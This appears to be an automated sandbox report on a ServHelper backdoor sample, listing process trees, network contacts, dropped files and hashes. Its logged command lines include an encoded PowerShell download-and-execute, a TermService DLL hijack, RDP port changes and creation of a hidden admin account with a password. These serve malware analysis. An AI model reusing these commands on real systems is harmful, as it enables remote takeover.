PID 1092 wrote to memory of 1840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1840 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1840 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1424 wrote to memory of 4032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1424 wrote to memory of 4032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4032 wrote to memory of 3984 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4032 wrote to memory of 3984 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1092 wrote to memory of 3784 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1092 wrote to memory of 3784 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3784 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3784 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2176 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2808 wrote to memory of 2196 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2808 wrote to memory of 2196 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3812 wrote to memory of 568 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3812 wrote to memory of 568 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 568 wrote to memory of 740 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 568 wrote to memory of 740 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3668 wrote to memory of 3500 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3668 wrote to memory of 3500 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3500 wrote to memory of 400 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3500 wrote to memory of 400 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 976 wrote to memory of 3556 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 976 wrote to memory of 3556 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3556 wrote to memory of 3764 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3556 wrote to memory of 3764 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3604 wrote to memory of 876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3604 wrote to memory of 876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 876 wrote to memory of 2676 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 876 wrote to memory of 2676 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3444 wrote to memory of 2980 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3444 wrote to memory of 2980 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2980 wrote to memory of 2756 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2980 wrote to memory of 2756 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3480 wrote to memory of 400 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3480 wrote to memory of 400 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 400 wrote to memory of 4052 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 400 wrote to memory of 4052 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4044 wrote to memory of 3912 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4044 wrote to memory of 3912 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe

"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ky0cd0ry\ky0cd0ry.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA841.tmp" "c:\Users\Admin\AppData\Local\Temp\ky0cd0ry\CSC37CB2EB3121A4206B5E6BEA37C38AEFE.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net.exe

net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc FWXHxFTu /add

C:\Windows\system32\net.exe

net.exe user wgautilacc FWXHxFTu /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc FWXHxFTu /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc FWXHxFTu

C:\Windows\system32\net.exe

net.exe user wgautilacc FWXHxFTu

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc FWXHxFTu

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 www.speedtest.net udp
US 151.101.2.219:80 www.speedtest.net tcp
US 151.101.2.219:443 www.speedtest.net tcp
US 151.101.2.219:80 www.speedtest.net tcp
US 8.8.8.8:53 c.speedtest.net udp
US 151.101.2.219:443 c.speedtest.net tcp
US 8.8.8.8:53 speedtest.nl-ams.llhost-inc.eu udp
NL 5.101.44.180:8080 speedtest.nl-ams.llhost-inc.eu tcp
US 8.8.8.8:53 speedtest.korton.net udp
NL 91.239.33.168:8080 speedtest.korton.net tcp
US 8.8.8.8:53 speedtest.spl.vodafone.nl udp
NL 62.140.138.205:8080 speedtest.spl.vodafone.nl tcp
US 8.8.8.8:53 speedtest2.usenet.farm udp
NL 178.20.174.136:8080 speedtest2.usenet.farm tcp
US 8.8.8.8:53 asgyyya6ychcha.xyz udp

Files

memory/628-114-0x0000025AE4840000-0x0000025AE4C3F000-memory.dmp

memory/628-117-0x0000025AE4423000-0x0000025AE4425000-memory.dmp

memory/628-116-0x0000025AE4420000-0x0000025AE4422000-memory.dmp

memory/628-119-0x0000025AE4426000-0x0000025AE4427000-memory.dmp

memory/628-118-0x0000025AE4425000-0x0000025AE4426000-memory.dmp

memory/1092-120-0x0000000000000000-mapping.dmp

memory/1092-126-0x0000022046E10000-0x0000022046E11000-memory.dmp

memory/1092-128-0x0000022046E80000-0x0000022046E82000-memory.dmp

memory/1092-129-0x0000022046E83000-0x0000022046E85000-memory.dmp

memory/1092-133-0x0000022061150000-0x0000022061151000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/1092-139-0x0000022046E86000-0x0000022046E88000-memory.dmp

memory/2056-140-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\ky0cd0ry\ky0cd0ry.cmdline

MD5 755df1ce73deb575fea1a4ae46275374
SHA1 487a61f48c88b5e92df5c706077ea410a5e5cdfb
SHA256 a171aea10a12a09c4ca7ed50515b76a866d51f5d6cc5478fa690f958f0c2d1be
SHA512 611fe0199da71c20a2c4ddc9105d879fbdafe4594f3bd61521dc24c7cabbae80e5c3c62a47c7a4037eab0bbe9b71453b979e04b893a26b9d67387eb675f9975b

\??\c:\Users\Admin\AppData\Local\Temp\ky0cd0ry\ky0cd0ry.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/2452-143-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\ky0cd0ry\CSC37CB2EB3121A4206B5E6BEA37C38AEFE.TMP

MD5 d12b1ff3595abef1e967e7810a903ae0
SHA1 62112b3f78a7668b5fbc9d5c1e814ac4bb6b261f
SHA256 cf8f1e066b891d4fea84020d0c1b44cba113c14353e57d3a9854f848418b688b
SHA512 ef0f0e28bfe06eb2da9f19cf338562a1960f99d61cf8160dee19778c00bed650cc02a38c3b30ddc1c38e54d4c3a25dd9a3ca645c3bb72302cd7a7791f5196f18

C:\Users\Admin\AppData\Local\Temp\RESA841.tmp

MD5 dd2bd9e89f270d2cadc103665c9f48d3
SHA1 ba70dfe57ec4a7295c9c6e3bdf16e151d086c509
SHA256 213e58dda308f6e59ee98a451cf2869e67e4611521967d98a3c32b67eea65561
SHA512 3061041007dfc13ca3f658ee5fe06a2b01c759c5507dc4c3075cf2f45ab7a9d7121476e5df7fdc4243ca0620c9f7fb8082f897d0561371d30967aa7fcc147453

C:\Users\Admin\AppData\Local\Temp\ky0cd0ry\ky0cd0ry.dll

MD5 131ca5240a8c5574648dfc8239478f34
SHA1 b0150dc97e296f82881cf3ab75e52fb048f16dc4
SHA256 d6a66d935fa38011c2e25cd50d5dec88505154eadf43ec3de306047586d89746
SHA512 ff12ab0ddec4abed31d8f83ec53ee5c1c9be1ea02c89ef6ce7acf5850357cb9c9b6157d33b6242d3318766de96991614f3f49b03b109ecf92da42acde57b249d

memory/1092-147-0x0000022046E40000-0x0000022046E41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 f784c76a5f451d89ecd31dc71a8c26cb
SHA1 81b9f4163f834ea3cf133e2be9b8b81279e41c6b
SHA256 8d77e8f87f57c3cc6c5b19ea782763c6a4c3c18ee750357c050543d913e6ac9f
SHA512 5b8fd465141921c4791739fe5186b615594ae47e16c568fe6a640cb67c21aa25b0e1b5910c3eb56cf3a23ce4c6d251664e132a3007956ed3453dce3d1f713981

memory/1092-151-0x0000022046E88000-0x0000022046E89000-memory.dmp

memory/1092-154-0x0000022061650000-0x0000022061651000-memory.dmp

memory/1092-155-0x00000220619E0000-0x00000220619E1000-memory.dmp

memory/3604-163-0x0000000000000000-mapping.dmp

memory/3604-175-0x000002A22A2B0000-0x000002A22A2B2000-memory.dmp

memory/3604-176-0x000002A22A2B3000-0x000002A22A2B5000-memory.dmp

memory/3604-179-0x000002A22A2B6000-0x000002A22A2B8000-memory.dmp

memory/3604-204-0x000002A22A2B8000-0x000002A22A2BA000-memory.dmp

memory/3976-210-0x0000000000000000-mapping.dmp

memory/3976-240-0x000001D9915F0000-0x000001D9915F2000-memory.dmp

memory/3976-242-0x000001D9915F3000-0x000001D9915F5000-memory.dmp

memory/3976-244-0x000001D9915F6000-0x000001D9915F8000-memory.dmp

memory/2808-255-0x0000000000000000-mapping.dmp

memory/2808-272-0x0000027B18073000-0x0000027B18075000-memory.dmp

memory/2808-271-0x0000027B18070000-0x0000027B18072000-memory.dmp

memory/2808-275-0x0000027B18076000-0x0000027B18078000-memory.dmp

memory/2736-309-0x0000000000000000-mapping.dmp

memory/3812-310-0x0000000000000000-mapping.dmp

memory/976-311-0x0000000000000000-mapping.dmp

memory/3556-348-0x0000000000000000-mapping.dmp

memory/3968-349-0x0000000000000000-mapping.dmp

memory/1840-352-0x0000000000000000-mapping.dmp

memory/1424-353-0x0000000000000000-mapping.dmp

memory/4032-354-0x0000000000000000-mapping.dmp

memory/3984-355-0x0000000000000000-mapping.dmp

memory/3784-356-0x0000000000000000-mapping.dmp

memory/2176-357-0x0000000000000000-mapping.dmp

memory/2808-358-0x0000000000000000-mapping.dmp

memory/2196-359-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 02de1d05ec7c49607d0469e7731760c6
SHA1 39f0cddc616ab7ccfd0030f9aa257d6603373fb6
SHA256 dcb3e99447dd9c7093c425de2dc13d18342299d6b3876542c8b18542b80ec9eb
SHA512 a33b3da342c96816477347e0dfb6a54b2202990370260aa7fb3de6774c6868a9abef8ec1c794115d927432346153663a600142ca86701adaf1cde2b28f749f82

\Windows\Branding\mediasvc.png

MD5 a82cc23d45b8e1de9897fa40dbfebecb
SHA1 16590d3f0a035e0c01a9959593dd35b5d417a18e
SHA256 300f336a781a00987d35d4db230a14f96d3566ad324d8a5f9b0193095ef3d821
SHA512 b644dc69e2937ce23dd0e49f19bf1541f3e72fc9d1ff1a27d9ec009ad908fc19d8470c11dfe49a305cc9db278d684c31553107f8f4808a157e6c2a3873f5025a

memory/568-362-0x0000000000000000-mapping.dmp

memory/740-363-0x0000000000000000-mapping.dmp

memory/3500-364-0x0000000000000000-mapping.dmp

memory/400-365-0x0000000000000000-mapping.dmp

memory/3556-366-0x0000000000000000-mapping.dmp

memory/3764-367-0x0000000000000000-mapping.dmp

memory/876-368-0x0000000000000000-mapping.dmp

memory/2676-369-0x0000000000000000-mapping.dmp

memory/2980-370-0x0000000000000000-mapping.dmp

memory/2756-371-0x0000000000000000-mapping.dmp

memory/400-372-0x0000000000000000-mapping.dmp

memory/4052-373-0x0000000000000000-mapping.dmp

memory/3912-374-0x0000000000000000-mapping.dmp

memory/3604-375-0x0000000000000000-mapping.dmp

memory/3780-376-0x0000000000000000-mapping.dmp

memory/1632-377-0x0000000000000000-mapping.dmp

memory/1632-391-0x00000260DA2A0000-0x00000260DA2A2000-memory.dmp

memory/1632-392-0x00000260DA2A3000-0x00000260DA2A5000-memory.dmp

memory/1632-395-0x00000260DA2A6000-0x00000260DA2A8000-memory.dmp

memory/1632-405-0x00000260DA2A8000-0x00000260DA2A9000-memory.dmp

memory/2840-459-0x0000000000000000-mapping.dmp

memory/980-460-0x0000000000000000-mapping.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-24 18:54

Reported

2021-09-24 18:56

Platform

win7-en-20210920

Max time kernel

147s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QGVL9753X1SCJ6GRIAKH.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 8005d2a775b1d701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1048 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1048 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1048 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 1092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 516 wrote to memory of 1092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 516 wrote to memory of 1092 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1092 wrote to memory of 508 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1092 wrote to memory of 508 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1092 wrote to memory of 508 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 516 wrote to memory of 272 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 272 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 272 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 2020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 2020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 2020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 1000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 1000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 1000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 516 wrote to memory of 1500 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 516 wrote to memory of 1500 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 516 wrote to memory of 1500 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 516 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 516 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
